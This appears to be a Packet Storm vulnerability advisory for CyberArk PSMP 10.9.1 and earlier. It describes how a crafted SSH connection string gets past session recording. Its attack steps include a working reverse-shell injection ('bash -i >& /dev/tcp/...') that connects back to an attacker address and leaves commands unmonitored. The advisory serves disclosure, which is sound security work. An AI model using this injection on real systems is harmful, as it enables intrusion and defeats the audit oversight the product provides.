what you don't know can hurt you

CyberArk PSMP 10.9.1 Policy Restriction Bypass

CyberArk PSMP 10.9.1 Policy Restriction Bypass
Posted Mar 23, 2020
Authored by Lahbal Said

CyberArk PSMP versions 10.9.1 and below suffer from a policy restriction bypass vulnerability.

tags | exploit, bypass
MD5 | fea36c34fde3e78289e0b797b8b29c0b

CyberArk PSMP 10.9.1 Policy Restriction Bypass

Change Mirror Download
# Exploit Title: CyberArk PSMP 10.9.1 - Policy Restriction Bypass
# Google Dork: NA
# Date: 2020-02-25
# Exploit Author: LAHBAL Said
# Vendor Homepage: https://www.cyberark.com/
# Software Link: https://www.cyberark.com/
# Version: PSMP <=10.9.1
# Tested on: PSMP 10.9 & PSMP 10.9.1
# CVE : N/A
# Patched : PSMP >= 11.1

[Prerequisites]

Policy allows us to overwrite PSMRemoteMachine

[Description]
An issue was discovered in CyberArk Privileged Session Manager SSH Proxy
(PSMP)
through 10.9.1.
All recordings mechanisms (Keystoke, SSH Text Recorder and video) can be
evaded
because users entries are not properly validated.
Commands executed in a reverse shell are not monitored.
The connection process will freeze just after the "session is being
recorded" banner and the all commands we enter are not monitored.

------------------------------------------

[Additional Information]
We can got a reverse shell (or execute any command we want) from remote
target and be completely invisible from CyberArk. In logs, we have only
both PSMConnect and PSMDisconnect events.
Here are details of the attack :
1. I connect through CyberArk PSMP server using this
connection string : ssh <vaultUserName>%username+address%'remoteMachine
bash -i >& /dev/tcp/<AttackerIP>/<AttackerPort0>&1'@<psmpServer>
Example : ssh slahbal%sharedLinuxAccount+test.intra%'linux01 bash -i >&
/dev/tcp/192.168.0.10/443 0>&1'@psmp
3. This connection string will :
- Connect me to linux01 using sharedLinuxAccount account that is stored
into CyberArk and to which I have access.
- Create a reverse shell to my workstation 192.168.0.10:443 (nc.exe is
listening on port 443 for this test).
4. The connection process will freeze just after "The sessions is being
recorded" banner
5. I got a reverse shell on which all commands ar not monitored.
Note 1 : The command that created the reverse shell is NOT captured by
CyberArk.
Note 2 : sshd_config has been set with those parameters :
PSMP_AdditionalDelimiter %
PSMP_TargetAddressPortAdditionalDelimiter +

------------------------------------------

[VulnerabilityType Other]
Bypass all recordings mechanisms (Keystoke, SSH Text Recorder and video)

------------------------------------------

[Vendor of Product]
CyberArk

------------------------------------------

[Affected Product Code Base]
PSMP - <=10.9.1

------------------------------------------

[Affected Component]
/opt/CARKpsmp/bin/psmpserver

------------------------------------------

[Attack Type]
Local

------------------------------------------

[CVE Impact Other]
The vulnerability allow you to connect through CyberArk PSMP server
bypassing all recordings mechanisms

------------------------------------------

[Attack Vectors]
To exploit the vulnerability, someone must connect through PSMP using a
crafted connection string.

------------------------------------------

[Has vendor confirmed or acknowledged the vulnerability?]
true

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

April 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    60 Files
  • 2
    Apr 2nd
    20 Files
  • 3
    Apr 3rd
    10 Files
  • 4
    Apr 4th
    0 Files
  • 5
    Apr 5th
    0 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    0 Files
  • 9
    Apr 9th
    0 Files
  • 10
    Apr 10th
    0 Files
  • 11
    Apr 11th
    0 Files
  • 12
    Apr 12th
    0 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    0 Files
  • 16
    Apr 16th
    0 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close